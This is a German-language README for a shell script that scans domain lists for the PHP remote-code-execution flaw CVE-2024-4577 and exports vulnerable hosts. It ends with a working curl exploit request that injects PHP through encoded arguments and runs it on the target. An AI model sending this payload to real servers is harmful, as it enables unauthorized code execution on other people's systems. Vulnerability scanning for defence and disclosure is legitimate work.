
Shell-Skript zum Scannen von Domänen auf die CVE-2024-4577 PHP Remote-Code-Ausführungs-Sicherheitslücke über manipulierte POST-Anfragen, das verwundbare Ziele zur manuellen Überprüfung exportiert.
Dieses Skript dient zur Überprüfung auf die Sicherheitslücke CVE-2024-4577, die durch die Ausnutzung bestimmter PHP-Konfigurationen die Ausführung von beliebigem Code aus der Ferne ermöglicht. Es sendet eine POST-Anfrage an bestimmte Endpunkte einer Liste von Domains und prüft, ob die Antwort auf eine Verwundbarkeit hindeutet.
GNU Parallel installieren:
sudo apt-get install parallel
Repository klonen: Klonen Sie dieses Repository mit Git auf Ihren lokalen Rechner:
git clone https://github.com/Yukiioz/CVE-2024-4577.git
In das Repository navigieren: Wechseln Sie in das geklonte Verzeichnis:
cd CVE-2024-4577
Domain-Liste vorbereiten: Erstellen Sie eine Textdatei mit einer Liste der zu überprüfenden Domains. Jede Domain sollte in einer neuen Zeile stehen. Beispiel:
https://example1.com
https://example2.com
https://example3.com
Skript ausführen:
Führen Sie das Skript CVE-2024-4577.sh aus und übergeben Sie den Pfad zur Domain-Liste als Argument:
./CVE-2024-4577.sh live-subdomains.txt | tee script.log
Ausgabe überprüfen:
Das Skript zeigt Fortschrittsinformationen an, während es jede Domain prüft. Wenn eine Domain als verwundbar erkannt wird, wird sie rot hervorgehoben. Das Skript exportiert außerdem eine Liste der verwundbaren Domains in eine Datei namens vulnerable_domains.txt.
vulnerable_domains.txtDas Skript exportiert eine Liste der verwundbaren Domains in eine Datei mit dem Namen vulnerable_domains.txt. Diese Datei enthält eine einfache Liste der verwundbaren Domains, jede Domain in einer neuen Zeile. Zur manuellen Bestätigung senden Sie mit dem curl-Befehl eine POST-Anfrage an den Ziel-Endpunkt auf der Domain. Ersetzen Sie https://dev.example.com/test.php durch den tatsächlichen Endpunkt auf der Ziel-Domain.
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"